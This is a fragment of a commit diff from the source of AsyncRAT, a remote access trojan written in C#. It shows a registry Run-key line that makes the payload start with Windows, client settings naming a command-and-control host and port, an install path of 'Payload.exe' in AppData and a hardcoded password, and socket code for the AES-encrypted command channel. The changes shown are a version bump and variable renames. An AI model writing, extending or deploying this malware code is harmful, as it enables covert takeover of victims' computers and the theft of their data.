Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
Methods.CloseMutex();

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -8,7 +8,7 @@ namespace Client
{
public static readonly string Ports = "6606";
public static readonly string Host = "127.0.0.1";
public static readonly string Version = "AsyncRAT 0.4B";
public static readonly string Version = "AsyncRAT 0.4C";
public static readonly string Install = "false";
public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";

12
AsyncRAT-C#/Client/Sockets/ClientSocket.cs
View File

@ -93,12 +93,12 @@ namespace Client.Sockets
return;
}
int Recevied = Client.EndReceive(Iar);
if (Recevied > 0)
int recevied = Client.EndReceive(Iar);
if (recevied > 0)
{
if (BufferRecevied == false)
{
MS.Write(Buffer, 0, Recevied);
MS.Write(Buffer, 0, recevied);
Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///");
MS.Dispose();
@ -111,7 +111,7 @@ namespace Client.Sockets
}
else
{
MS.Write(Buffer, 0, Recevied);
MS.Write(Buffer, 0, recevied);
if (MS.Length == Buffersize)
{
ThreadPool.QueueUserWorkItem(HandlePacket.Read, Settings.aes256.Decrypt(MS.ToArray()));
@ -138,7 +138,7 @@ namespace Client.Sockets
}
}
public static void BeginSend(byte[] Msg)
public static void BeginSend(byte[] msg)
{
lock (SendSync)
{
@ -150,7 +150,7 @@ namespace Client.Sockets
return;
}
byte[] buffer = Settings.aes256.Encrypt(Msg);
byte[] buffer = Settings.aes256.Encrypt(msg);
byte[] buffersize = BitConverter.GetBytes(buffer.Length);
Client.Poll(-1, SelectMode.SelectWrite);